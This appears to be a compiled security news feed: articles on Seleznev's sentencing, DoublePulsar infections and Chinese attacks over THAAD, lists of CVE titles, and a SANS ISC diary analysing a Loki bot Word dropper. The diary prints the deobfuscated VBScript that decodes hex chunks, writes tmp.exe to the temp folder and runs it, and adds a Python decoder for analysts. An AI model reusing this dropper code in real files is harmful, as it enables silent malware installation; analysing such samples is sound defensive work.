Images of Seleznev with stacks of cash were found on his laptop following his 2014 arrest in the Maldives. (credit: Department of Justice)

Russian hacker Roman Seleznev was sentenced to 27 years in prison today. He was convicted of causing more than $169 million in damage by hacking into point-of-sale computers.

Seleznev, aka "Track2," would hack into computers belonging to both small businesses and large financial institutions, according to prosecutors. He was arrested in the Maldives in 2014 with a laptop that had more than 1.7 million credit card numbers. After an August 2016 trial, Seleznev was convicted on 38 counts, including wire fraud, intentional damage to a protected computer, and aggravated identity theft.

The sentence is quite close to the 30 years that the government asked for. Prosecutors said Seleznev deserved the harsh sentence because he was "a pioneer" who helped grow the market for stolen credit card data and because he "became one of the most revered point-of-sale hackers in the criminal underworld."


Oracle WebCenter Sites CVE-2017-3554 Remote Security Vulnerability
Oracle FLEXCUBE Universal Banking CVE-2017-3535 Remote Security Vulnerability
Oracle Hospitality OPERA 5 Property Services CVE-2017-3552 Remote Security Vulnerability
Oracle MySQL Connectors CVE-2017-3590 Local Security Vulnerability
Multiple McAfee Products CVE-2017-4028 Local Code Injection Vulnerability

A script scanning the Internet for computers infected by DoublePulsar. On the left, a list of IPs Shodan detected having the backdoor installed. On the right are pings used to manually check if a machine is infected. (credit: Dan Tentler)

Security experts believe that tens of thousands of Windows computers may have been infected by a highly advanced National Security Agency backdoor. The NSA backdoor was included in last week's leak by the mysterious group known as Shadow Brokers.

DoublePulsar, as the NSA implant is code-named, was detected on more than 107,000 computers in one Internet scan. That scan was performed over the past few days by researchers from Binary Edge, a security firm headquartered in Switzerland. Binary Edge has more here. Separate mass scans, one done by Errata Security CEO Rob Graham and another by researchers from Below0day, detected roughly 41,000 and 30,000 infected machines, respectively. To remain stealthy, DoublePulsar doesn't write any files to the computers it infects. This design prevents it from persisting after an infected machine is rebooted. The lack of persistence may be one explanation for the widely differing results.



Pexip Infinity CVE-2017-6551 Remote Code Execution Vulnerability
QEMU 'hw/display/cirrus_vga_rop.h' Multiple Memory Corruption Vulnerabilities
ImageMagick CVE-2017-7943 Denial of Service Vulnerability
Cisco IOS XE Software CVE-2017-6615 Denial of Service Vulnerability
Cisco Firepower System Software CVE-2016-6368 Denial of Service Vulnerability

South Korea is deploying Lockheed Martin's THAAD missile defense system, and that's sparked the ire of the Chinese government, as well as military and "hacktivist" hacking groups, according to FireEye. (credit: US Army)

Chinese government officials have been very vocal in their opposition to the deployment of the Terminal High-Altitude Air Defense (THAAD) system in South Korea, raising concerns that the anti-ballistic missile system's sensitive radar sensors could be used for espionage. And according to researchers at the information security firm FireEye, Chinese hackers have transformed objection to action by targeting South Korean military, government, and defense industry networks with an increasing number of cyberattacks. Those attacks included a denial of service attack against the website of South Korea's Ministry of Foreign Affairs, which the South Korean government says originated from China.

FireEye's director of cyber-espionage analysis John Hultquist told the Wall Street Journal that FireEye had detected a surge in attacks against South Korean targets from China since February, when South Korea announced it would deploy THAAD in response to North Korean missile tests. The espionage attempts have focused on organizations associated with the THAAD deployment. They have included "spear-phishing" e-mails carrying attachments loaded with malware, along with "watering hole" attacks that planted exploit code on websites frequented by military, government, and defense industry officials in order to download malware onto their machines.

FireEye claims to have found evidence that the attacks were staged by two groups connected to the Chinese military. One, dubbed Tonto Team by FireEye, operates from the same region of China as previous North Korean hacking operations. The other is known among threat researchers as APT10, or "Stone Panda"—the same group believed to be behind recent espionage efforts against US companies lobbying the Trump administration on global trade. These groups have also been joined in attacks by two "patriotic hacking" groups not directly tied to the Chinese government, Hultquist told the Journal—including one calling itself "Denounce Lotte Group" targeting the South Korean conglomerate Lotte. Lotte made the THAAD deployment possible through a land swap with the South Korean government.


Oracle Sun ZFS Storage Appliance Kit (AK) CVE-2017-3621 Remote Security Vulnerability
Oracle FLEXCUBE Private Banking CVE-2017-3478 Remote Security Vulnerability
Oracle Automatic Service Request CVE-2017-3581 Local Security Vulnerability
Oracle Solaris Cluster CVE-2016-5551 Local Security Vulnerability
Oracle MySQL Server CVE-2017-3468 Remote Security Vulnerability
Oracle MySQL Server CVE-2017-3463 Remote Security Vulnerability
Oracle MySQL Server CVE-2017-3462 Remote Security Vulnerability
Oracle FLEXCUBE Private Banking CVE-2017-3473 Remote Security Vulnerability
CVE-2017-7192: Starscream library before 2.0.4 allows SSL pinning bypass
Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
Linux Kernel CVE-2017-7645 Multiple Denial of Service Vulnerabilities
Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability

(credit: Confide)

A man in Michigan has sued Confide, a secure messaging app that is reportedly used by Republicans in the Trump White House, over allegations that the app isn’t nearly as secure when run on a desktop computer, as opposed to a mobile device.

While the app does prevent screenshots on mobile devices, the new lawsuit, which was filed in federal court in New York on Thursday, notes that the app fails to block screenshots on Windows. Similarly, the macOS and Windows versions both allow entire messages to be read all at once rather than line-by-line, as the mobile app does. The two desktop platforms also lack a key feature—notification of a screenshot.

"By failing to offer the protections it advertised, Confide not only fails to maintain the confidentiality of messages sent or received by desktop App users, but its entire user base," lawyers for the plaintiff, Jeremy Auman, wrote in their civil complaint.


Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability

Thanks to our readers, we often get interesting samples to analyze. This time, Frederick sent us a malicious Microsoft Word document called Invoice_6083.doc (which was delivered in a zip archive). I had a quick look at it with viper:

viper Invoice_6083.doc
viper Invoice_6083.doc > virustotal -v
[+] VirusTotal Report for bc922d7335a58ae4269bfd652d62f03e:
[*] Detecting engines:
+----------------------+------------------------------+
| Antivirus            | Signature                    |
+----------------------+------------------------------+
| Ad-Aware             | Trojan.GenericKD.4881915     |
| AegisLab             | Troj.Ole2.Agent!c            |
| Arcabit              | Trojan.Generic.D4A7DFB       |
| Avast                | VBS:Agent-BRE [Trj]          |
| BitDefender          | Trojan.GenericKD.4881915     |
| Cyren                | Trojan.OGWQ-7                |
| ESET-NOD32           | VBS/Kryptik.FI               |
| Emsisoft             | Trojan.GenericKD.4881915 (B) |
| F-Secure             | Trojan.GenericKD.4881915     |
| Fortinet             | VBS/Kryptik.GA!tr            |
| GData                | Trojan.GenericKD.4881915     |
| Kaspersky            | HEUR:Trojan.OLE2.Agent.gen   |
| McAfee               | W97M/Downloader              |
| McAfee-GW-Edition    | W97M/Downloader              |
| MicroWorld-eScan     | Trojan.GenericKD.4881915     |
| NANO-Antivirus       | Trojan.Script.NJRat.dzzenc   |
| Qihoo-360            | virus.vbs.qexvmc.1           |
| Symantec             | Trojan.Mdropper              |
| TrendMicro           | TROJ_DROPPER.XXTWD           |
| TrendMicro-HouseCall | TROJ_DROPPER.XXTWD           |
| ZoneAlarm            | HEUR:Trojan.OLE2.Agent.gen   |
+----------------------+------------------------------+
[*] 21 out of 56 antivirus detected bc922d7335a58ae4269bfd652d62f03e as malicious.

A first behaviour is interesting: the document does not ask the user to enable macros if they are not enabled.

A shell object is attached to the "Preview" button (clearly visible in the screenshot).

The OLE object is listed in the following screenshot as ObjectPool-_1554011838-Ole10Native. Once extracted, it contains a VBScript that rebuilds a long string from hex-encoded chunks (the hex literals, several kilobytes of them, are elided here):

gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("<hex chunk elided>")
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("<hex chunk elided>")
...(stuff deleted)...
gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc & dghdggaqiojdndgmnxlosjodpkdd("<hex chunk elided>")
ExecuteGlobal gdtyaqiopndghdliosndgaqponvc

Function dghdggaqiojdndgmnxlosjodpkdd(gdtyaqiopndghdliosndgaqponvc)
    ' Walk the string two characters at a time: each pair of hex digits becomes one character
    For y = 1 To Len(gdtyaqiopndghdliosndgaqponvc) Step 2
        ml = ml & CHRW(CLng("&H" & Mid(gdtyaqiopndghdliosndgaqponvc, y, 2)))
    Next
    dghdggaqiojdndgmnxlosjodpkdd = ml
End Function

The function dghdggaqiojdndgmnxlosjodpkdd walks the string two characters at a time and converts each pair of hex digits into a character. Everything is appended into one long string that is passed to ExecuteGlobal(). The result (the hex string assigned to data, which embeds the executable, is elided here):

data="<hex elided>H<hex-encoded executable elided>"
data=split(data,"H")(1)
sub saveFile(fName,str)
    dim temp
    set xmldoc = CreateObject("Microsoft.XMLDOM")
    xmldoc.loadXml "<?xml version=""1.0""?>"
    set pic = xmldoc.createElement("pic")
    ' bin.hex makes MSXML decode the hex string into raw bytes
    pic.dataType = "bin.hex"
    pic.nodeTypedValue = str
    temp = pic.nodeTypedValue
    with CreateObject("ADODB.Stream")
        .type = 1
        .open
        .write temp
        .saveToFile fName, 2
        .close
    end with
end sub
set ws = CreateObject("WScript.Shell")
fn = ws.ExpandEnvironmentStrings("%temp%") & "\tmp.exe"
saveFile fn,data
ws.Run fn
wscript.sleep 100

The key is to split the string data on the character H and use the second element. Right after the H, you can see the bytes 0x4D 0x5A, which mark the beginning of the malicious payload (the MZ header of a PE file). The extracted file, Invoice_6083.exe, was then loaded into viper for further analysis.
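As an added example (not part of the diary), here is a small Python script that replays the two decoding layers described above so an analyst can carve the embedded executable out of the macro text without ever executing it. The function names are mine, and the hex chunks are a constructed stand-in for the real blobs: a minimal dropper line carrying a 16-byte DOS-header stub instead of the actual executable.

```python
import hashlib
import re


def decode_hex_pairs(s: str) -> str:
    """Re-implements the macro's decoder: two hex digits at a time,
    each pair becomes one character (VBScript CHRW(CLng("&H" & pair)))."""
    if len(s) % 2:
        raise ValueError("hex chunk has odd length")
    return "".join(chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2))


def rebuild_script(chunks) -> str:
    """Layer 1: the macro concatenates every decoded chunk into the string
    it later hands to ExecuteGlobal; here it is only rebuilt, never run."""
    return "".join(decode_hex_pairs(c) for c in chunks)


def extract_payload(script: str) -> bytes:
    """Layer 2: locate data="...", split on 'H' exactly like
    split(data,"H")(1) does, and hex-decode the second element."""
    m = re.search(r'data\s*=\s*"([^"]*)"', script)
    if not m:
        raise ValueError('no data="..." assignment found')
    parts = m.group(1).split("H")
    if len(parts) < 2:
        raise ValueError("no 'H' separator: script does not match this dropper")
    return bytes.fromhex(parts[1])


def triage(chunks) -> dict:
    """Carve the payload and report what an analyst wants before touching it."""
    payload = extract_payload(rebuild_script(chunks))
    return {
        "size": len(payload),
        "is_pe": payload[:2] == b"MZ",   # 0x4D 0x5A, the MZ header
        "md5": hashlib.md5(payload).hexdigest(),
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


# Constructed stand-in for the macro's hex chunks (not the real sample):
# a dropper line with a generic 16-byte DOS-header stub after the 'H',
# hex-encoded and split at arbitrary even boundaries as the macro does.
STAND_IN_SCRIPT = ('data="0011AABBH4D5A90000300000004000000FFFF0000":'
                   'data=split(data,"H")(1):saveFile fn,data')
STAND_IN_HEX = STAND_IN_SCRIPT.encode("ascii").hex().upper()
SAMPLE_CHUNKS = [STAND_IN_HEX[:20], STAND_IN_HEX[20:70], STAND_IN_HEX[70:]]

if __name__ == "__main__":
    print(triage(SAMPLE_CHUNKS))
```

On the real document you would paste the chunk literals from the macro into SAMPLE_CHUNKS; the resulting hashes can then be checked against VirusTotal before the file is ever opened.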

It communicates with hxxp:// (the full URL is not preserved here). The sample is a Loki bot, which is known to steal logins from many applications and Bitcoin wallets from the infected computer.

To summarise, the malicious document:

  • Does not automatically execute the malicious macro but asks the victim to execute it
  • Contains multiple layers of obfuscation
  • Drops a payload which is not downloaded from the wild Internet but stored (hex-encoded) in the macro.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
